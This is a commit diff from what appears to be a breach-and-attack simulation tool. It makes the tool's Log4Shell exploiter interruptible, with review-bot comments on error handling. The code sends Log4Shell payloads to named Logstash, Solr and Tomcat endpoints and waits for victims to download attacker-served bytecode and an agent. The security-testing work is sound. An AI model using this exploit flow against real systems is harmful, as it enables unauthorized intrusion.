Agent: Make log4shell interruptable

vakaris_zilius 2022-03-21 15:04:24 +00:00
parent 7a1fcced2f
commit 41278c8044
4 changed files with 32 additions and 14 deletions


@ -1,6 +1,7 @@
import logging import logging
import time import time
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from infection_monkey.exploit.log4shell_utils import ( from infection_monkey.exploit.log4shell_utils import (
LINUX_EXPLOIT_TEMPLATE_PATH, LINUX_EXPLOIT_TEMPLATE_PATH,
WINDOWS_EXPLOIT_TEMPLATE_PATH, WINDOWS_EXPLOIT_TEMPLATE_PATH,
@ -12,7 +13,6 @@ from infection_monkey.exploit.log4shell_utils import (
from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.i_puppet.i_puppet import ExploiterResultData from infection_monkey.i_puppet.i_puppet import ExploiterResultData
from infection_monkey.model import DOWNLOAD_TIMEOUT as AGENT_DOWNLOAD_TIMEOUT
from infection_monkey.model import DROPPER_ARG, LOG4SHELL_LINUX_COMMAND, LOG4SHELL_WINDOWS_COMMAND from infection_monkey.model import DROPPER_ARG, LOG4SHELL_LINUX_COMMAND, LOG4SHELL_WINDOWS_COMMAND
from infection_monkey.network.info import get_free_tcp_port from infection_monkey.network.info import get_free_tcp_port
from infection_monkey.network.tools import get_interface_to_target from infection_monkey.network.tools import get_interface_to_target
@ -25,10 +25,8 @@ logger = logging.getLogger(__name__)
class Log4ShellExploiter(WebRCE): class Log4ShellExploiter(WebRCE):
_TARGET_OS_TYPE = ["linux", "windows"] _TARGET_OS_TYPE = ["linux", "windows"]
_EXPLOITED_SERVICE = "Log4j" _EXPLOITED_SERVICE = "Log4j"
SERVER_SHUTDOWN_TIMEOUT = 15 SERVER_SHUTDOWN_TIMEOUT = LONG_REQUEST_TIMEOUT
REQUEST_TO_VICTIM_TIMEOUT = ( REQUEST_TO_VICTIM_TIMEOUT = MEDIUM_REQUEST_TIMEOUT
5 # Max time agent will wait for the response from victim in SECONDS
)
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
self._open_ports = [ self._open_ports = [
@ -135,6 +133,11 @@ class Log4ShellExploiter(WebRCE):
# because we don't know which services are running and on which ports # because we don't know which services are running and on which ports
for exploit in get_log4shell_service_exploiters(): for exploit in get_log4shell_service_exploiters():
for port in self._open_ports: for port in self._open_ports:
if self._is_interrupted():
self._set_interrupted()
return self.exploit_result
logger.debug( logger.debug(
f'Attempting Log4Shell exploit on for service "{exploit.service_name}"' f'Attempting Log4Shell exploit on for service "{exploit.service_name}"'
f"on port {port}" f"on port {port}"
@ -147,24 +150,26 @@ class Log4ShellExploiter(WebRCE):
f"potential {exploit.service_name} service: {ex}" f"potential {exploit.service_name} service: {ex}"
) )
if self._is_interrupted():
self._set_interrupted()
return self.exploit_result
if self._wait_for_victim(): if self._wait_for_victim():
self.exploit_info["vulnerable_service"] = { self.exploit_info["vulnerable_service"] = {
"service_name": exploit.service_name, "service_name": exploit.service_name,
"port": port, "port": port,
} }
self.exploit_info["vulnerable_urls"].append(url) self.exploit_info["vulnerable_urls"].append(url)
self.exploit_result.exploitation_success = True
self.exploit_result.propagation_success = True self.exploit_result.propagation_success = True
def _wait_for_victim(self) -> bool: def _wait_for_victim(self) -> bool:
# TODO: Peridodically check to see if ldap or HTTP servers have exited with an error. If
# they have, return with an error.
victim_called_back = False
victim_called_back = self._wait_for_victim_to_download_java_bytecode() victim_called_back = self._wait_for_victim_to_download_java_bytecode()
if victim_called_back: if victim_called_back:
self._wait_for_victim_to_download_agent() self._wait_for_victim_to_download_agent()
if self._is_interrupted():
return False
return victim_called_back return victim_called_back
def _wait_for_victim_to_download_java_bytecode(self) -> bool: def _wait_for_victim_to_download_java_bytecode(self) -> bool:
@ -174,8 +179,12 @@ class Log4ShellExploiter(WebRCE):
start_time, Log4ShellExploiter.REQUEST_TO_VICTIM_TIMEOUT start_time, Log4ShellExploiter.REQUEST_TO_VICTIM_TIMEOUT
): ):
if self._exploit_class_http_server.exploit_class_downloaded(): if self._exploit_class_http_server.exploit_class_downloaded():
self.exploit_result.exploitation_success = True
return True return True
if self._is_interrupted():
return False
time.sleep(1) time.sleep(1)
logger.debug("Timed out while waiting for victim to download the java bytecode") logger.debug("Timed out while waiting for victim to download the java bytecode")
@ -184,10 +193,14 @@ class Log4ShellExploiter(WebRCE):
def _wait_for_victim_to_download_agent(self): def _wait_for_victim_to_download_agent(self):
start_time = time.time() start_time = time.time()
while not self._victim_timeout_expired(start_time, AGENT_DOWNLOAD_TIMEOUT): while not self._victim_timeout_expired(start_time, LONG_REQUEST_TIMEOUT):
if self._agent_http_server_thread.downloads > 0: if self._agent_http_server_thread.downloads > 0:
break break
if self._is_interrupted():
return
# TODO: if the http server got an error we're waiting for nothing here
time.sleep(1) time.sleep(1)
@classmethod @classmethod
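Review bot: An interrupt that arrives while waiting for the agent download leaves the result inconsistent: by then `_wait_for_victim_to_download_java_bytecode` has set `exploitation_success = True`, but `_wait_for_victim` returns False on interrupt, so the caller never fills `exploit_info["vulnerable_service"]` or `vulnerable_urls` for a service the report marks as exploited. In the non-interrupted path, `propagation_success = True` is still set whenever the bytecode was fetched, even if `_wait_for_victim_to_download_agent` only ran out its timeout, because that method returns nothing. I would end that method with `return self._agent_http_server_thread.downloads > 0`, set `propagation_success` from that value, and record the service and URL at the point where exploitation is confirmed. The loop that consumes `_wait_for_victim()` begins outside the visible hunks, so this is based only on the lines shown.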


@ -2,6 +2,7 @@ from logging import getLogger
import requests import requests
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
from infection_monkey.model import VictimHost from infection_monkey.model import VictimHost
@ -15,7 +16,7 @@ class LogStashExploit(IServiceExploiter):
def trigger_exploit(payload: str, host: VictimHost, port: int): def trigger_exploit(payload: str, host: VictimHost, port: int):
url = f"http://{host.ip_addr}:{port}/_node/hot_threads?human={payload}" url = f"http://{host.ip_addr}:{port}/_node/hot_threads?human={payload}"
try: try:
requests.get(url, timeout=5, verify=False) # noqa DUO123 requests.get(url, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False) # noqa DUO123
except requests.ReadTimeout as e: except requests.ReadTimeout as e:
logger.debug(f"Log4shell request failed {e}") logger.debug(f"Log4shell request failed {e}")
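Review bot: Only `requests.ReadTimeout` is handled around the request in `trigger_exploit`, so a connect timeout or a refused connection leaves as an exception while a read timeout is logged and swallowed here; the Solr and Tomcat sections below have the same handler. The caller in the first file appears to log exceptions from `trigger_exploit` (the `potential {exploit.service_name} service: {ex}` message), so this is probably not a crash, but the two paths produce different log lines for the same kind of event. Either catch `requests.RequestException` here or drop the local handler and let the caller log. The message would also be easier to correlate if it named the target, e.g. `logger.debug(f"Log4shell request to {host.ip_addr}:{port} failed: {e}")`.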


@ -2,6 +2,7 @@ from logging import getLogger
import requests import requests
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
from infection_monkey.model import VictimHost from infection_monkey.model import VictimHost
@ -15,7 +16,7 @@ class SolrExploit(IServiceExploiter):
def trigger_exploit(payload: str, host: VictimHost, port: int): def trigger_exploit(payload: str, host: VictimHost, port: int):
url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}" url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
try: try:
requests.post(url, timeout=5, verify=False) # noqa DUO123 requests.post(url, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False) # noqa DUO123
except requests.ReadTimeout as e: except requests.ReadTimeout as e:
logger.debug(f"Log4shell request failed {e}") logger.debug(f"Log4shell request failed {e}")


@ -2,6 +2,7 @@ from logging import getLogger
import requests import requests
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
from infection_monkey.model import VictimHost from infection_monkey.model import VictimHost
@ -16,7 +17,9 @@ class TomcatExploit(IServiceExploiter):
url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample" url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample"
payload = {"dataname": "foo", "datavalue": payload} payload = {"dataname": "foo", "datavalue": payload}
try: try:
requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123 requests.post( # noqa DUO123
url, data=payload, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False
)
except requests.ReadTimeout as e: except requests.ReadTimeout as e:
logger.debug(f"Log4shell request failed {e}") logger.debug(f"Log4shell request failed {e}")